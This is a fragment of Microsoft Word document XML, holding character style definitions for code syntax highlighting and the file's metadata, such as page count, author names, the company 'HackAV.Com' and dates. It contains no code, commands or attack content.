  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-attribute">
    <w:name w:val="hljs-attribute"/>
    <w:basedOn w:val="a0"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-constant">
    <w:name w:val="hljs-constant"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-number">
    <w:name w:val="hljs-number"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-symbol">
    <w:name w:val="hljs-symbol"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-string">
    <w:name w:val="hljs-string"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-title">
    <w:name w:val="hljs-title"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-literal">
    <w:name w:val="hljs-literal"/>
    <w:basedOn w:val="a0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ab">
    <w:name w:val="标题 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="aa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A9653D-233B-4455-A288-D19FE9E47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13</Pages>
  <Words>1050</Words>
  <Characters>5991</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>49</Lines>
  <Paragraphs>14</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company>HackAV.Com</Company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A1Pass</dc:creator>
  <cp:lastModifiedBy>JackLoong</cp:lastModifiedBy>
  <cp:revision>42</cp:revision>
  <cp:lastPrinted>2017-03-18T09:51:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-27T06:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-10T08:19:00Z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